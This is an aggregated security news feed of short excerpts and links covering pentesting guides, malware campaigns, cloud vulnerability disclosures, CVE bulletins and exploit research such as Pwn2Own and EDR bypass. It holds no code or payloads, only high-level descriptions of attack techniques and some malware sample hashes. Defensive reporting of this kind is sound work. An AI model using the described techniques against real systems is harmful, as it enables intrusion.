Lambert Rosique and Jan Keller, Security Workflow Automation, and Diana Kramer, Alexandra Bowen and Andrew Cho, Privacy and Security Incident ResponseIntroductionAs security professionals, we're constantly looking for ways to reduce risk and improve our workflow's efficiency. We've made great strides in using AI to identify malicious content, block threats, and discover and fix vulnerabilities. We also published the Secure AI Framework (SAIF), a conceptual framework for secure AI systems to ensure we are deploying AI in a responsible manner. Today we are highlighting another way we use generative AI to help the defenders gain the advantage: Leveraging LLMs (Large Language Model) to speed-up our security and privacy incidents workflows.Incident management is a team sport. We have to summarize...
http://security.googleblog.com/2024/04/accelerating-incident-response-using.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Jenkins Penetration Testing
Jenkins is an open-source automation server used for continuous integration (CI) and continuous delivery (CD). It’s built on Java and utilizes a scripting platform for
The post Jenkins Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/jenkins-penetration-testing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing millions of developers through 2FA
We've dramatically increased 2FA adoption on GitHub as part of our responsibility to make the software ecosystem more secure. Read on to learn how we secured millions of developers and why we're urging more organizations to join us in these efforts.
The post Securing millions of developers through 2FA appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/securing-millions-of-developers-through-2fa/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
January 2024 Cyber Attacks Statistics
In January 2024 I collected 288 events, with Cyber Crime continuing to lead the motivations, and ransomware leading the known attack techniques, ahead of Malware.
https://www.hackmageddon.com/2024/04/24/january-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tomcat Penetration Testing
Apache Tomcat, developed by the Apache Software Foundation, is a widely used web server and servlet container. Originally, it served as a demonstration platform for
The post Tomcat Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/tomcat-penetration-testing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers.
The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Burp Extension: JWT-scanner
Authentication and authorization are critical components of any application. Various standards and frameworks have been developed to facilitate the development of such components and make applications more secure. Among them, JSON Web Tokens (JWTs) have become popular choice over the years.
In this article, we discuss commons flaws in JWT-based authentication and present our extension to automatically check for these issues in Burp: JWT-scanner.
https://blog.compass-security.com/2024/04/new-burp-extension-jwt-scanner/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVEs Targeting Remote Access Technologies
In this first quarter of 2024, threat actors have been particularly busy in exploiting vulnerabilities (0-days but also old unpatched flaws) targeting traditional remote access technologies. In this blog post I summarized the main CVEs exploited so far in 2024.
https://www.hackmageddon.com/2024/04/22/cves-targeting-remote-access-technologies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Giving NIST Digital Identity Guidelines a Boost: Supplement for Incorporating Syncable Authenticators
We all need supplements sometimes. Whether it's a little extra vitamin C during flu season or some vitamin D during the dark days of Winter. When used correctly, supplements help our body adjust to the changing conditions around us. Similarly, we are applying this same concept for the first time to our NIST SP 800-63B, Digital Identity Guidelines: Authentication and Lifecycle Management. Today, we published a supplement that provides interim guidance for agencies seeking to make use of ‘syncable authenticators' ( for example, passkeys) in both enterprise-facing and public-facing use cases
https://www.nist.gov/blogs/cybersecurity-insights/giving-nist-digital-identity-guidelines-boost-supplement-incorporating
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Detailed Guide on Pwncat
Pwncat stands out as an open-source Python tool highly regarded for its versatility, providing a contemporary alternative to the traditional netcat utility. Tailored for network
The post A Detailed Guide on Pwncat appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-pwncat/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Response to March 2024 CSRB report
Publication Date: 2024/04/19 09:00 AM PDT
AWS is aware of a recent Cyber Safety Review Board (CSRB) report regarding a 2023 Microsoft Online Exchange issue. We are not affected by the issues described in this report and no customer action is required.
At AWS, security is our top priority. Every AWS customer benefits from the fact that we have the most operational experience of any cloud provider. We designed AWS from its very foundation to be the most secure way for our customers to run their workloads, and built our internal culture around security as a business imperative. The security of the AWS cloud is unique and differentiated by our technology, culture, and practices.
To learn more, please refer to our "How the unique culture of security at AWS makes a difference" blog post....
https://aws.amazon.com/security/security-bulletins/AWS-2024-004/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #2: A brief history of the feature
@import url(https://themes.googleusercontent.com/fonts/css?kit=lhDjYqiy3mZ0x6ROQEUoUw);ul.lst-kix_isoepzyy3bf4-8{list-style-type:none}ul.lst-kix_isoepzyy3bf4-7{list-style-type:none}ul.lst-kix_isoepzyy3bf4-6{list-style-type:none}ul.lst-kix_isoepzyy3bf4-5{list-style-type:none}ul.lst-kix_isoepzyy3bf4-4{list-style-type:none}ul.lst-kix_isoepzyy3bf4-3{list-style-type:none}ul.lst-kix_isoepzyy3bf4-2{list-style-type:none}ul.lst-kix_isoepzyy3bf4-1{list-style-type:none}.lst-kix_qqcc7cub1y3f-1>li:before{content:"25cb "}ul.lst-kix_isoepzyy3bf4-0{list-style-type:none}.lst-kix_qqcc7cub1y3f-0>li:before{content:"25cf "}.lst-kix_qqcc7cub1y3f-5>li:before{content:"25a0 "}.lst-kix_qqcc7cub1y3f-3>li:before{content:"25cf "}.lst-kix_qqcc7cub1y3f-7>li:before{content:"25cb "}.lst-kix_qqcc7cub1y3f-2>li:before{content:"25a0...
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-2.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #1: Introduction and research results
ul.lst-kix_c4pdvykpeuss-3{list-style-type:none}ul.lst-kix_c4pdvykpeuss-2{list-style-type:none}ul.lst-kix_c4pdvykpeuss-1{list-style-type:none}ul.lst-kix_c4pdvykpeuss-0{list-style-type:none}.lst-kix_2wnifzn4nxg9-1>li:before{content:"25cb "}ul.lst-kix_5uedwcx8bazf-3{list-style-type:none}ul.lst-kix_5uedwcx8bazf-4{list-style-type:none}.lst-kix_2wnifzn4nxg9-0>li:before{content:"25cf "}.lst-kix_2wnifzn4nxg9-2>li:before{content:"25a0 "}.lst-kix_4m34njm6c6og-6>li:before{content:"25cf "}ul.lst-kix_5uedwcx8bazf-5{list-style-type:none}ul.lst-kix_5uedwcx8bazf-6{list-style-type:none}.lst-kix_2wnifzn4nxg9-3>li:before{content:"25cf "}.lst-kix_4m34njm6c6og-7>li:before{content:"25cb "}ul.lst-kix_5uedwcx8bazf-7{list-style-type:none}ul.lst-kix_5uedwcx8bazf-8{list-style-type:none}.lst-kix_4m34njm6c6og-8>li:before{content:"25a0...
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […]
The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.3.1ClamAV 1.3.1 is a critical patch release with the following fixes:CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition.This issue affects version 1.3.0 only and does not affect prior versions.Thank you to Błażej Pawłowski for identifying this issue.GitHub pull requestUpdated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2024-28056
Publication Date: 2024/04/15 07:00 AM PST
AWS is aware of CVE-2024-28056, which affects Amplify CLI versions prior to 12.10.1 and Amplify Studio, which uses Amplify CLI. We released a fix to Amplify CLI on January 10, 2024 that also fixed Amplify Studio, and recommend customers upgrade to Amplify CLI 12.10.1 or higher to address this issue. We have proactively communicated with the customers using affected versions.
AWS has taken two additional steps to protect customers using Amplify from unintentional misconfigurations. First, AWS added a mitigation to the AWS Security Token Service (STS) where attempts to make a cross-account role assumption with a trust policy referencing Amazon Cognito as the trusted principal, without conditions to scope down access to specific Amazon Cognito...
https://aws.amazon.com/security/security-bulletins/AWS-2024-003/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Amplify IAM role publicly assumable exposure
The AWS Amplify service was found to be misconfiguring IAM roles associated
with Amplify projects. This misconfiguration caused these roles to be assumable
by any other AWS account. Both the Amplify Studio and the Amplify CLI
exhibited this behavior. Any Amplify project created using the Amplify CLI
built between July 3, 2018 and August 8, 2019 had IAM roles that were assumable by
anyone in the world. The same was true if the authentication component was removed
from an Amplify project using the Amplify CLI or Amplify Studio built between
August 2019 and January 2024. AWS mitigated this vulnerability through backend changes to
STS and IAM, and also released a patch for the Amplify CLI to ensure that newly
created roles are properly configured in accordance with these changes.
https://www.cloudvulndb.org/aws-amplify-iam-role-publicly-assumable-exposure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Glue database password leakage
A principal with the permissions glue:GetConnection and ec2:DescribeSubnets
can retrieve the database password of a connection, since the password is loaded into
the AWS console website when a connection's edit page is requested. The severity of
this issue is low since it requires sufficient prior access.
https://www.cloudvulndb.org/aws-glue-database-password-leakage
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Detailed Guide on RustScan
In the realm of cybersecurity, network scanning tools play a vital role in reconnaissance and vulnerability assessment. Among the array of options available, Rustscan has
The post A Detailed Guide on RustScan appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-rustscan/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender
regularly audits popular IoT hardware for vulnerabilities. This research paper
is part of a broader program that aims to shed light on the security of the
world's best-sellers in the IoT space. This report covers vulnerabilities
discovered while researching the LG WebOS TV operating system.
We have found several issues affecting WebOS versions 4 through 7 running on LG
TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Behind The Scenes Of Ransomware Attacks
This is hopefully the most useless blog post you will read this year as this post will detail our experience dealing with ransomware cases. It is one of the most common reasons why we get called in to help and it has become a big business. Chainalysis, for example, has tracked .1 billion in ransomware […]
https://blog.compass-security.com/2024/04/behind-the-scenes-of-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS IAM Trust Policy Condition Evaluation Bug
Tag variable names affected whether trust policy conditions were evaluated correctly.
If the request tag referenced a principal tag called MemberRole in the JWT token, and
the IAM role referenced a resource tag with the same variable name, the condition was
always evaluated as true, regardless of whether the tag's values actually matched. Only
role trust policies that used a variable substitution for both the request tag and the
resource tag in the policy statement resulted in the policy evaluating incorrectly. The
issue impacted statements within IAM boundary policies and SCP policies that contained
the same pattern of STS role assumption with tag-based conditions.
https://www.cloudvulndb.org/aws-iam-trust-policy-condition-evaluation-bug
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and
crannies of the internet. So much so that cybercrooks are hitching free rides on
the AI bandwagon by leveraging the increased demand of AI-powered software for
content creators.
Cybercriminal groups constantly adapt their operating methods and tools to stay
a step ahead of potential victims. Highly focused on enhancing their deceptive
practices, threat actors have, unfortunately, found a most reliable and powerful
a
https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security research without ever leaving GitHub: From code scanning to CVE via Codespaces and private vulnerability reporting
This blog post is an in-depth walkthrough on how we perform security research leveraging GitHub features, including code scanning, CodeQL, and Codespaces.
The post Security research without ever leaving GitHub: From code scanning to CVE via Codespaces and private vulnerability reporting appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/security-research-without-ever-leaving-github-from-code-scanning-to-cve-via-codespaces-and-private-vulnerability-reporting/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2024-3094
Publication Date: 2024/03/29 12:30 PM PST CVE Identifier: CVE-2024-3094
AWS is aware of CVE-2024-3094, which affects versions 5.6.0 and 5.6.1 of the xz-utils package. This issue may attempt to introduce security issues in openssh through the use of liblzma within some operating system environments. Amazon Linux customers are not affected by this issue, and no action is required. AWS infrastructure and services do not utilize the affected software and are not impacted. Users of Bottlerocket are not affected.
Customers using other operating systems are advised to refer to information provided by the OS vendor to address any concerns originating from this reported issue.
Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.
https://aws.amazon.com/security/security-bulletins/AWS-2024-002/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pwn2Own Toronto 2023: Part 5 – The Exploit
In this final part of this series, we are finally going to explain how the stack-based buffer overflow vulnerability can be exploited to gain unauthenticated remote code execution (RCE) on the Synology BC500 camera.
https://blog.compass-security.com/2024/03/pwn2own-toronto-2023-part-5-the-exploit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sensor Intel Series: Top CVEs in February 2024
27 new CVEs, and continued IoT targeting. See what's new from February 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-february-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pwn2Own Toronto 2023: Part 4 – Memory Corruption Analysis
In this fourth part of the series, we analyze the memory corruption identified previously and manage to overwrite the program pointer!
https://blog.compass-security.com/2024/03/pwn2own-toronto-2023-part-4-memory-corruption-analysis/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pwn2Own Toronto 2023: Part 3 – Exploration
In this third part of the series, we focus on the exposed web services running on TCP ports 80 and 443.
Since a valid exploit chain must achieve code execution without prior authentication, we focus on the available functionality that can be accessed without authentication.
https://blog.compass-security.com/2024/03/pwn2own-toronto-2023-part-3-exploration/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protecting Model Updates in Privacy-Preserving Federated Learning
In our second post we described attacks on models and the concepts of input privacy and output privacy. ln our last post, we described horizontal and vertical partitioning of data in privacy-preserving federated learning (PPFL) systems. In this post, we explore the problem of providing input privacy in PPFL systems for the horizontally-partitioned setting. Models, training, and aggregation To explore techniques for input privacy in PPFL, we first have to be more precise about the training process. In horizontally-partitioned federated learning, a common approach is to ask each participant to
https://www.nist.gov/blogs/cybersecurity-insights/protecting-model-updates-privacy-preserving-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FlowFixation
A flaw in Amazon Managed Workflows for Apache Airflow (MWAA) could have allowed potential session hijacking and remote code execution.
The issue stemmed from a combination of session fixation in the MWAA web management panel and an AWS domain configuration error leading
to a cross-site scripting (XSS) attack. Attackers exploiting this could manipulate victims' configurations, trigger workflows, and
potentially move laterally to other services within the cloud environment. The exploit of this bug involved deploying malicious code
via an Amazon API Gateway that interacts with the victim's Airflow instance, setting a session cookie that bypasses normal authentication
and grants the attacker access.
https://www.cloudvulndb.org/flowfixation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Gaining kernel code execution on an MTE-enabled Pixel 8
In this post, I'll look at CVE-2023-6241, a vulnerability in the Arm Mali GPU that allows a malicious app to gain arbitrary kernel code execution and root on an Android phone. I'll show how this vulnerability can be exploited even when Memory Tagging Extension (MTE), a powerful mitigation, is enabled on the device.
The post Gaining kernel code execution on an MTE-enabled Pixel 8 appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2024 Bad Bots Review
Learn the latest trends in bots and malicious automation so you can compare with attacks against your own organizations.
https://www.f5.com/labs/articles/threat-intelligence/2024-bad-bots-review
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Synapse Analytics privilege escalation via intelligent caching
Tenable Research discovered a privilege escalation flaw that allows a user to escalate privileges to that
of the root user within the context of a Spark VM. This escalation was achieved because of a permissions
issue with scripts utilized by the intelligent caching service (AKA "Vegas") present in the environment.
https://www.cloudvulndb.org/synapse-vegas-lpe
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing.
I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept user's network connections (Man-in-the-Middle attack).
It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams.
In the past couple of months, Bitdefender Labs has been monitoring a steep
increase in fraudulent social media ads on Facebook promoting various swindles
ranging from crypto-doubling
[https://www.bitdefender.com/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/]
to AI-generated celebrity-endorsed giveaways
[https://www.bitdefender.com/blog/labs/audio-deepfakes-celebrity-endorsed-givea
https://www.bitdefender.com/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro.
The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Updates on NIST's Interagency International Cybersecurity Standardization Working Group
Last November, I was pleased to chair the most recent meeting of the Interagency International Cybersecurity Standardization Working Group (IICSWG) – a group NIST created in 2016. Our charge, from the Cybersecurity Enhancement Act of 2014, was to build a coordination mechanism for government agencies to discuss international cybersecurity standardization issues, consistent with agencies' responsibilities under OMB Circular A-119. Since then, IICSWG has grown as a forum to discuss cybersecurity and privacy standardization topics, examine the overall cybersecurity standardization landscape (
https://www.nist.gov/blogs/cybersecurity-insights/updates-nists-interagency-international-cybersecurity-standardization
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection
capabilities for our macOS cyber-security products; part of this effort involves
revisiting old (or digging up new) samples from our malware zoo. During routine
verifications, we were able to isolate multiple suspicious and undetected macOS
disk image files surprisingly small for files of this kind (1.3 MB per file).
A short look into the code revealed that these files are significantly similar
to other samples analysed in the
https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Data Distribution in Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Our first post in the series introduced the concept of federated learning and described how it's different from traditional centralized learning - in federated learning, the data is distributed among participating organizations, and
https://www.nist.gov/blogs/cybersecurity-insights/data-distribution-privacy-preserving-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Travel Update! The NIST CSF 2.0 is HERE…Along with Many Helpful Resources…
NIST CSF 2.0 QUICK LINKS | Explore our Full Suite of Resources: CSF 2.0 Quick Start Guides CSF 2.0 Profiles CSF 2.0 Informative References Cybersecurity & Privacy Reference Tool (CPRT) CSF 2.0 Reference Tool CSF 2.0 Website ( Homepage ) Official NIST News Announcement The NIST Cybersecurity Framework (CSF) development process all started with Executive Order (EO)13636 over a decade ago, which called for building a set of approaches ( a framework ) for reducing risks to critical infrastructure. Through this EO, NIST was tasked with developing a "Cybersecurity Framework." We knew that, to do
https://www.nist.gov/blogs/cybersecurity-insights/travel-update-nist-csf-20-herealong-many-helpful-resources
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Looking Forward, Looking Back: A Quarter Century as a CISO
Gail Coury explores how cybersecurity has evolved and what the future holds, after a distinguished career as a CISO.
https://www.f5.com/labs/articles/cisotociso/looking-forward-looking-back-a-quarter-century-as-a-ciso
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 [https://nvd.nist.gov/vuln/detail/CVE-2024-23204] sheds light on
the critical importance of continuous security vigilance. Apple's Shortcuts
application, designed to enhance user automation, can inadvertently become a
potential vector for privacy breaches. This analysis aims to provide users,
developers, and security professionals with insights into the nature of the
vulnerability, its potential impact, and recommended mitigation measures.
At a glance:
* We have discovered a vul
https://www.bitdefender.com/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to stay safe from repo-jacking
Repo-jacking is a specific type of supply chain attack. This blog post explains what it is, what the risk is, and what you can do to stay safe.
The post How to stay safe from repo-jacking appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/how-to-stay-safe-from-repo-jacking/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Decrypted: HomuWitch Ransomware
HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies.
The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sensor Intel Series: Top CVEs in January 2024
More IoT Targeting, plus a bunch of new CVEs! See what attackers went after in January 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-january-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Audio deepfakes: Celebrity-endorsed giveaway scams and fraudulent investment opportunities flood social media platforms
Bitdefender Labs has been keeping up with the latest modus operandi of
cybercrooks who adapt emerging technologies to siphon money from consumers.
Artificial intelligence is just one of the many tools that help in the creation
and successful dissemination of online schemes to extort money and sensitive
information.
This paper focuses on voice cloning (audio deepfakes) schemes and how they are
proliferated via social media to trick unsuspecting victims.
Before delving deeper into the main subj
https://www.bitdefender.com/blog/labs/audio-deepfakes-celebrity-endorsed-giveaway-scams-and-fraudulent-investment-opportunities-flood-social-media-platforms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NIST Celebrates National Entrepreneurship Week
What is National Entrepreneurship (NatlEshipWeek) Week? Celebrated February 10-17, 2024, “NatlEshipWeek is a congressionally chartered week dedicated to empowering entrepreneurship across the United States. The annual initiative was relaunched in 2017 as NatlEshipWeek to bring together a network of partners from Maui to Miami to educate, engage, and build equitable access to America's Entrepreneurship Ecosystem.” Follow along online with #NatlEshipWeek. You can learn more about the initiative here: https://www.natleshipweek.org/about . Supporting Entrepreneurship is at the Heart of NIST's
https://www.nist.gov/blogs/cybersecurity-insights/nist-celebrates-national-entrepreneurship-week
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Decrypted: Rhysida Ransomware
The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations.
The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Azure Site Recovery privilege escalation
When the ASR service is enabled, it uses an Automation Account with a System-Assigned Managed Identity
to manage Site Recovery extensions on VMs. However, the Runbook (a set of scripts for managing extensions)
executed by the Automation Account had its job output visible to users, and this output mistakenly included
a cleartext Management-scoped Access Token for the System-Assigned Managed Identity, which possesses the
Contributor role over the entire Azure subscription. Therefore, lower-privileged user roles who could access
the Automation Account's job output could see and use this Access Token. This access allowed these users to
impersonate the Managed Identity, thereby elevating their privileges to that of a Contributor for the whole
subscription, including the ability to execute commands...
https://www.cloudvulndb.org/azure-site-recovery-pe
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New macOS Backdoor Written in Rust Shows Possible Link with Windows Ransomware Group
UPDATE:
Following our initial release, we have been contacted by our fellow researchers
at Jamf who were able to identify three more samples that act like first-stage
payloads. They are responsible for downloading the backdoor:
* e7cab6f2be47940bf36e279bbec54ec7 - Jobinfo.app.zip
* 26d6a7e3507edf9953684d367dcd44bd - Jobinfo.zip
* 775851f86cbde630808ff6d2cf8cedbf - Jobinfo.zip
Combined with information in our previous research, the investigation of these
samples revealed new components of t
https://www.bitdefender.com/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable!Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support.The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and may not be available until later in the day.Continue reading to learn what changed in each version.1.3.0ClamAV 1.3.0 includes the following improvements and changes:Major changesAdded support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Avast Q4/2023 Threat Report
10 Billion Attacks Blocked in 2023, Qakbot's Resurrection, and Google API Abused
The post Avast Q4/2023 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q4-2023-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AppSec is harder than you think. Here's how AI can help.
In practice, shifting left has been more about shifting the burden rather than the ability. But AI is bringing its promise closer to reality. Here's how.
The post AppSec is harder than you think. Here's how AI can help. appeared first on The GitHub Blog.
https://github.blog/security/application-security/appsec-is-harder-than-you-think-heres-how-ai-can-help/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Azure HDInsight privilege escalation and DoS vulnerabilities
Three privilege escalation and denial-of-service vulnerabilities were discovered in Azure HDinsight, related to their usage of Apache Oozie and Ambari.
The root cause of at least one of these vulnerabilities is a flaw in Apache Oozie itself, leading to regex denial-of-service (ReDoS). The other two vulnerabilities
could allow an authenticated attacker with HDI cluster access to gain cluster administrator privileges and perform any resource service management operation.
The vulnerabilities were patched in the October 2023 security update of Azure HDinsight.
https://www.cloudvulndb.org/azure-hdinsight-dos
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bots Cheat to Win
How automated fraudsters tried to ruin a restaurant’s promotional contest.
https://www.f5.com/labs/articles/threat-intelligence/bots-cheat-to-win
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2024-21626 - Runc container issue
Publication Date: 2024/01/31 1:30 PM PST CVE Identifier: CVE-2024-21626
AWS is aware of a recently disclosed security issue affecting the runc component of several open source container management systems (CVE-2024-21626). With the exception of the AWS services listed below, no customer action is required to address this issue.
Amazon Linux An updated version of runc is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or other container-related software apply those updates or a newer version. Further information is available in the Amazon Linux Security Center.
